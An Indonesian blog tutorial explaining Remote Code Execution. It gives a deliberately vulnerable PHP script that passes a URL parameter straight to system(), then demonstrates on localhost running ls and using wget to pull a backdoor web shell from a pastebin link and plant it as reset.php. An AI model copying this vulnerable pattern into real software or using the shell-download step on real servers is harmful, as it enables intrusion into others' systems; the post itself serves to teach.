Skip to main content

Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja?

Naufal Ardhani - Hallo gaes dah lama nih engga update artikel diblog ini karna gasempet buat nulis waktunya keambil terus sama kegiatan lain hehe , Kali ini Saya akan membahas sebuah metode yang bernama Remote Code Execution atau biasa disebut RCE.



Mungkin anda belum tau lebih jelas metode ini Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja? silahkan simak ya ada dibawah jawabannya.



  • Apa itu Remote Code Execution?

Remote Code Execution merupakan bug dimana sang attacker mempunyai kemampuan untuk mengeksekusi perintah di mesin target, biasanya memanfaatkan kelemahan aplikasi yang dijadikan target eksploitasi, memungkinkan attacker untuk menjalankan command2 secara remote melalui url. Bug ini biasanya terdapat pada aplikasi yg mnggunakan cgi.


  • Bagaimana Remote Code Execution itu bekerja?

Script PHP Remote Code Execution sederhana :
<?php echo "RemoteCodeExecution | www.naufalardhani.com<br><br><br>"; $cmd=$_GET['action']; echo "Command : " . $cmd . "<br><br>"; system($cmd); ?>
Script diatas merupakan contoh script yang rentan pada PHP, Sesimple itu kah susunan script Remote Code Execution? yaps benar masalahnya ada di system($command),
Ini akan menjalankan fungsi yang berhubungan dengan sistem.

Disini saya sudah mengupload script Remote Code Execution ke localhost dengan nama tools.php sebagai contoh target dan saya akan mempraktekan bagaimana sang Attacker melakukan Remote Code Execution pada sistem,

  1. Saya membuka link http://localhost:8888/tools.php ( contoh target )
  2. Dan saya menambahkan ?action= setelah http://localhost:8888/tools.php untuk melakukan Remote Code Execution, jadi seperti berikut linknya http://localhost:8888/tools.php?action= dan saya mencoba menjalankan command ls untuk melihat isi directory, http://localhost:8888/tools.php?action=ls dan terdapat 1 folder dan 3 file.
  3. Lalu sang Attacker mencoba memanggil Shell Backdoor RESET dengan command wget, seperti ini commandnya "wget linkshell -O namafile.php", http://localhost:8888/tools.php?action=wget https://pastebin.com/raw/**** -O reset.php
  4. lalu kita cek Shellnya, http://localhost:8888/reset.php
Nahh sudah terupload shellnya :)

Sampai disini saja artikel kali ini semoga bermanfaat bagi kalian semua dan jika ada kesalahan dalam penulisan artikel ini mohon di maklumi karna saya sebagai penulis juga masih belajar.

Request artikel / Mengoreksi kesalahan dalam artikel? silahkan isi di kolom komentar.
Labels:

Comments

Post a Comment

Popular posts from this blog

5 Kafe & Bakery Halal di Area Bugis Singapura

Fluff Bakery, Muslim Owned Beberapa tahun belakangan ini banyak muncul kafe dan bakery trendi di Singapura yang dikelola oleh anak-anak muda. Kabar gembira buat kita semua, banyak yang pemiliknya muslim. Jadi meskipun belum memiliki sertifikat halal, bahan-bahan makanan yang mereka gunakan halal semua. Beberapa kafe halal nan trendi tersebut terkonsentrasi di area Bugis, atau sering juga disebut sebagai Arab Quarter atau Kampong Glam. Area Bugis, di antara stasiun MRT Bugis dan MRT Lavender, memang pilihan utama sebagai base camp untuk traveler muslim. Di sini gampang dijumpai restoran, kafe, dan bakery halal. Dua pilihan restoran halal untuk makan besar (makan nasi) adalah Zam-Zam dan Hjh Maimunah . Zam-Zam lokasinya di 679 North Bridge Rd, persis di seberang Masjid Sultan. Resto ini menyajikan masakan India. Coba deh murtabak-nya yang terkenal enak banget. Sementara restoran Hjh Maimunah adalah salah satu restoran halal yang mendapat Michelin Star (peringkat untuk restoran yang bagu
Post a Comment
Read more

Call : 085813134112 Jasa Fogging Nyamuk di Jatiasih Bekasi

Call : 085813134112 Jasa Fogging Nyamuk di Jatiasih Bekasi , Jasa Pembasmi Kecoa di Medan Satria Bekasi, Jasa Pembasmi Cicak di Mustika Jaya Bekasi, Jasa Pembasmi Tawon di Pondok Melati Bekasi, Jasa Pembasmi Tomcat di Rawalumbu Bekasi, Jatisampurna Bekasi, Pondok Gede Bekasi. Garda Pest Control juga hadir diberbagai Kota lainnya seperti Jasa Fogging Nyamuk di Bali, Jasa Pembasmi Tawon di Cirebon, Jasa Pembasmi Kutu Kucing di Kemang, Jasa Pembasmi Tikus di Bogor, Jasa Pembasmi Kutu Anjing di Bandung, Jakarta Barat, Tangerang Selatan, Makassar, Palembang, Surabaya, Solo dll. Penyakit demam berdarah disebabkan oleh virus dengue yang diketahui memiliki empat serotipe virus dengue, di antaranya DEN-1, DEN-2, DEN-3, dan DEN-4. Di Indonesia sendiri, virus ini ditularkan oleh dua jenis nyamuk demam berdarah betina, yaitu Aedes aegypti sebagai vektor utama dan Aedes albopictus sebagai vektor sekunder. Jenis nyamuk demam berdarah ini memiliki sifat anthropofilik, artinya
Post a Comment
Read more

Tip Belanja Belanji di Sydney

Window display di QVB Setahun sekali di Sydney, ada hari khusus untuk berbelanja gila-gilaan, ketika SEMUA toko menawarkan diskon. Mereka menyebutnya Boxing Day . Saya menyebutnya Hari Raya Berbelanja :) Boxing Day dirayakan setiap tanggal 26 Desember, satu hari setelah Natal. Tadinya saya pikir Boxing Day ini berkaitan dengan 'tinju', tapi tinju yang bagaimana? Ternyata bukaaan. Pada awalnya, Boxing Day ini diramaikan dengan memberikan hadiah (natal) untuk orang-orang miskin, yang dikemas dalam kotak (box). Tapi maknanya kemudian bergeser menjadi hari belanja untuk menghabiskan uang lebaran atau angpao :) Biasanya, sebelum datang tanggal ini, orang-orang sudah mengincar apa yang ingin mereka beli pada Boxing Day. Katalog SALE bisa dilihat di internet, website masing-masing toko atau di Lasoo . Pasukan belanja sampai mati ini biasanya mengincar merk-merk terkenal, gaun-gaun disainer yang hanya memberi diskon setahun sekali pada hari tersebut. Nggak heran kalau mereka sampai bel
Post a Comment
Read more